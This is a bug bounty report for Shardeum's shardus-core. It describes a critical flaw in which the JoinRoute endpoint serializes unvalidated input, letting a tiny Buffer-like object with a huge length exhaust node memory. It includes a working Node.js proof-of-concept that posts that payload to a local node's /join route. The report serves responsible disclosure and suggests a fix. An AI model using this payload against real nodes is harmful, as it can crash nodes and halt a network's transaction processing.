#39191 [BC-Critical] JoinRoute: Attacker reachable input serialization
Submitted on Jan 24th 2025 at 12:04:06 UTC by @riproprip for Audit Comp | Shardeum: Core III
Report ID: #39191
Report Type: Blockchain/DLT
Report severity: Critical
Target: https://github.com/shardeum/shardus-core/tree/bugbounty
Impacts:
Network not being able to confirm new transactions (total network shutdown)
Description
Brief/Intro
JoinRoute allows an attacker to oom reap a node.
Vulnerability Details
JoinRoute trusts and serializes attacker controlled input before verifying the input.
The attacker can essentially describe in few bytes a memory structure that takes many bytes when serializing. This is a problem because it allows an attacker to allocate all the free memory till the OS has to step in and kill the process.
It seems that moving L85 to the front of the function and running it against the body would fix the problem. Not sure why shardeum is stringifying and parsing again in the first place?
Impact Details
Usually just the node process gets killed. In rare cases the OS also kills other processes.
References
The offendingline:
Proof of Concept
Proof of Concept
Setup
Setup shardus and
shardus start Ninstances.Save attack code under /tmp/1_attack.js
const axios = require("axios");
let objToSend = {hello: {type: 'Buffer', data: {0: 1, 1:1, 2:2, length:4294967295}}};
function attack() {
axios.post("http://localhost:9003/join", objToSend, {timeout: 2000 })
.then(
res => {
console.log('Status ', res.status);
console.log(res.data);
process.exit();
},
err => {console.log('ERR', err.message);}
)
}
attack();install dependencies
cd /tmp
npm install axiosrun
node /tmp/1_attack.jsnotes
Please find attached the screenshot of my attack run.
You can see the node at port 9003 using more and more memory.
At a certain point the OS steps in to reap the process (dmesg part of screenshot).
Was this helpful?